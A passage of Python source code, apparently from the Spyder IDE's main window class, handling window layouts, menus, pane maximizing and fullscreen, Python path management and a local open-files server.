'width fraction': [100], # Column 0 width
'height fraction': [[55, 45]], # Column 0, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Horizontally split
h_layout = {
'widgets': [
# column 0
[[editor]], # Row 0
# column 1
[[console_ipy, console_int, explorer_file, # Row 0
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[100], # Column 0, row heights
[100]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': []
}
# Layout selection
layouts = {
'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout,
}
layout = layouts[index]
# Remove None from widgets layout
widgets_layout = layout['widgets']
widgets_layout_clean = []
for column in widgets_layout:
clean_col = []
for row in column:
clean_row = [w for w in row if w is not None]
if clean_row:
clean_col.append(clean_row)
if clean_col:
widgets_layout_clean.append(clean_col)
# Flatten widgets list
widgets = []
for column in widgets_layout_clean:
for row in column:
for widget in row:
widgets.append(widget)
# We use both directions to ensure proper update when moving from
# 'Horizontal Split' to 'Spyder Default'
        # This also seems to help in random cases where the display seems
        # 'empty'
for direction in (Qt.Vertical, Qt.Horizontal):
# Arrange the widgets in one direction
for idx in range(len(widgets) - 1):
first, second = widgets[idx], widgets[idx+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
direction)
# Arrange the widgets in the other direction
for column in widgets_layout_clean:
for idx in range(len(column) - 1):
first_row, second_row = column[idx], column[idx+1]
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout_clean:
for row in column:
for idx in range(len(row) - 1):
first, second = row[idx], row[idx+1]
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Set dockwidget widths
width_fractions = layout['width fraction']
if len(width_fractions) > 1:
_widgets = [col[0][0].dockwidget for col in widgets_layout]
self.resizeDocks(_widgets, width_fractions, Qt.Horizontal)
# Set dockwidget heights
height_fractions = layout['height fraction']
for idx, column in enumerate(widgets_layout_clean):
if len(column) > 1:
_widgets = [row[0].dockwidget for row in column]
self.resizeDocks(_widgets, height_fractions[idx], Qt.Vertical)
# Hide toolbars
hidden_toolbars = layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
if first_spyder_run:
self.first_spyder_run = False
else:
self.setMinimumWidth(min_width)
self.setMaximumWidth(max_width)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
self.setUpdatesEnabled(True)
self.sig_layout_setup_ready.emit(layout)
return layout
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
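        """Switch to the next or previous layout in the list of active
        quick layouts."""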
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
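        """Build the 'Window layouts' menu from the active quick layouts."""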
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
        ql_actions = [create_action(self, _('Spyder Default Layout'),
                                    triggered=lambda:
                                    self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(
self,
_("Warning"),
_("<b>%s</b> will be overwritten. Do you want to "
"continue?") % name,
QMessageBox.Yes | QMessageBox.No
)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
CONF.set('quick_layouts', 'names', names)
CONF.set('quick_layouts', 'order', order)
CONF.set('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
section = 'quick_layouts'
names = CONF.get(section, 'names')
order = CONF.get(section, 'order')
active = CONF.get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
CONF.set(section, 'names', dlg.names)
CONF.set(section, 'order', dlg.order)
CONF.set(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The default layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (ie, where the index is greater than the number of
# defaults). See spyder-ide/spyder#6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
action = plugin._toggle_view_action
except AttributeError:
# New API
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
                # This is a submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
                # This is a submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
        self.undo_action.setEnabled(
            readwrite_editor and widget.document().isUndoAvailable())
        self.redo_action.setEnabled(
            readwrite_editor and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
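        """Populate the Panes menu with each plugin's toggle-view action."""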
order = ['editor', 'ipython_console', 'variable_explorer',
'help', 'plots', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console', None]
for plugin in self.widgetlist:
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if action:
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def createPopupMenu(self):
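        """Reimplement Qt method to use the Application plugin's context menu."""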
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def close_current_dockwidget(self):
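        """Close the pane that currently has keyboard focus."""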
widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
except AttributeError:
# Old API
if plugin.isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
def toggle_lock(self, value):
"""Lock/Unlock dockwidgets and toolbars"""
self.interface_locked = value
CONF.set('main', 'panes_locked', value)
self.lock_interface_action.setIcon(
ima.icon('lock' if self.interface_locked else 'lock_open'))
self.lock_interface_action.setText(
_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars"))
# Apply lock to panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
if self.interface_locked:
if plugin.dockwidget.isFloating():
plugin.dockwidget.setFloating(False)
plugin.dockwidget.remove_title_bar()
else:
plugin.dockwidget.set_title_bar()
# Apply lock to toolbars
# TODO: Move to layouts plugin (which will depend on Toolbar
# and MainMenu)
for toolbar in self.toolbar.toolbarslist:
if self.interface_locked:
toolbar.setMovable(False)
else:
toolbar.setMovable(True)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState(
version=WINDOW_STATE_VERSION
)
focus_widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.dockwidget.hide()
try:
# New API
if plugin.get_widget().isAncestorOf(focus_widget):
self.last_plugin = plugin
except Exception:
# Old API
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
            # so last_plugin can be None after the above loop.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
try:
# New API
self.setCentralWidget(self.last_plugin.get_widget())
except AttributeError:
# Old API
self.setCentralWidget(self.last_plugin)
self.last_plugin._ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
try:
# New API
self.last_plugin.get_widget().show()
self.last_plugin.change_visibility(True)
except AttributeError:
# Old API
self.last_plugin.show()
self.last_plugin._visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
try:
# New API
self.last_plugin.dockwidget.setWidget(
self.last_plugin.get_widget())
except AttributeError:
# Old API
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
try:
# New API
self.last_plugin.get_widget().is_maximized = False
except AttributeError:
# Old API
self.last_plugin._ismaximized = False
self.restoreState(self.state_before_maximizing,
version=WINDOW_STATE_VERSION)
self.state_before_maximizing = None
try:
# New API
self.last_plugin.get_widget().get_focus_widget().setFocus()
except AttributeError:
# Old API
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.fullscreen_flag:
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = ima.icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
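        """Toggle the main window between fullscreen and normal mode."""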
if self.fullscreen_flag:
self.fullscreen_flag = False
if os.name == 'nt':
self.setWindowFlags(
self.windowFlags()
^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint))
self.setGeometry(self.saved_normal_geometry)
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.saved_normal_geometry = self.normalGeometry()
if os.name == 'nt':
# Due to limitations of the Windows DWM, compositing is not
# handled correctly for OpenGL based windows when going into
# full screen mode, so we need to use this workaround.
# See spyder-ide/spyder#4291.
self.setWindowFlags(self.windowFlags()
| Qt.FramelessWindowHint
| Qt.WindowStaysOnTopHint)
screen_number = QDesktopWidget().screenNumber(self)
if screen_number < 0:
screen_number = 0
r = QApplication.desktop().screenGeometry(screen_number)
self.setGeometry(
r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2)
self.showNormal()
else:
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
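        """Redirect or restore the Internal Console's standard streams."""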
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
        Execute lines in the IPython console and, if requested, give focus
        to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
            OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
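        # Insert at index 1, presumably to keep sys.path[0] (the entry for
        # the running script / current directory) first.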
        for path, active in reversed(list(new_path_dict_p.items())):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
            except Exception:
                pass
else:
style_name = CONF.get('appearance', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
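        """
        Listen on a local socket for filenames (e.g. sent by another Spyder
        instance) and emit sig_open_external_file for each one received.
        """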
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
        while True:  # Serve requests until the socket is closed
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
        Quit and reset Spyder, then restart the application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
        # Note: The +6 pixels on the top make it look better
# FIXME: Why is this using the toolbars menu?
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
